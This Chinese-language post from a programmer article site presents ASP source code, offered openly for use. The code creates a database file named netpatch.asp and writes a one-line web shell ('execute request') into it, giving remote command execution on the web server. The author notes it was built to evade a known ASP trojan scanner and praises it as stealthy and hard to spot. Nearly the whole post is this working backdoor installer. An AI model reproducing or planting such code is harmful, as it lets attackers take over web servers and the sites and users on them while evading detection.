欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

新型ASP后门源代码分析

程序员文章站 2023-11-04 20:51:04
本是为了逃laker2兄 查asp木马程序的  现在已经挑战成功,已经加为检查对象了。公布出代码给冰点的朋友使使,希望大家喜欢!  利用的是a...
本是为了逃laker2兄 查asp木马程序的 
现在已经挑战成功,已经加为检查对象了。公布出代码给冰点的朋友使使,希望大家喜欢! 

利用的是adox.catalog组件 

复制代码 代码如下:
<%   
'code by netpatch  
dim dbfile,sql   
db="netpatch.asp"  
dbfile=server.mappath(db)   

set ydb=server.createobject("adox.catalog")   
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile   
set ydb=nothing   
if err.number=0 then   
response.write dbfile & " 创建成功<br> "   
else   
response.write "创建失败,原因: " & err.description   
response.end   
end if   

set conn = server.createobject("adodb.connection")   
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile   

sql="create table fdata([data] memo)"   
conn.execute(sql)   

set rs = createobject("adodb.recordset")   
rs.open "fdata", conn, 1, 3   
rs.addnew   
rs("data")="<%execute request(“n”))%>" '(注释记得去掉!一句话后门 execute request(“n”))  
rs.update   

%>  
此脚本主要是利用adox.catalog组件 
新建一个名称为netpatch.asp的空数据库文件 
然后把一句话木马插入新建的表中作为c/s版本的asp马用! 

优点,比较隐蔽,不容易让人看出这是什么作用的!